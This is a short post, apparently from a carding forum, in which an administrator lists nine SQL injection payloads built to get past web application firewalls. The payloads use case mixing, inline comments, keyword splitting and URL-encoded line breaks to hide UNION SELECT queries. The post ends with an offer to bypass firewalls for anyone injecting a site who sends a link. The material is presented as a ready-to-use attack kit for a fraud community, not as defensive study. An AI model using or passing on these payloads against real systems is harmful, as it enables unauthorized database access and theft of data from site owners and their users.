Carder Community


    Sql Injections Web Application Firewalls Bypasses- Tutorial

    Share
    avatar
    Admin
    Admin

    Posts : 116
    Join date : 2012-09-28

    Sql Injections Web Application Firewalls Bypasses- Tutorial

    Post  Admin on Thu Oct 04, 2012 6:16 am

    I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

    Sql Injections WAF bypass methods

    1) id=1+UnIoN+SeLecT 1,2,3—

    2) id=1+UnIOn/**/SeLect 1,2,3—

    3) id=1+UNIunionON+SELselectECT 1,2,3—

    4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—

    5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—

    6) id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—

    7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3—

    8 ) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3—

    /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3--

    9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3—


    If you are injecting any site and find some complicated WAF please post here or PM me the link and I will try to bypass it for you.

      Current date/time is Sun Jul 23, 2017 1:47 pm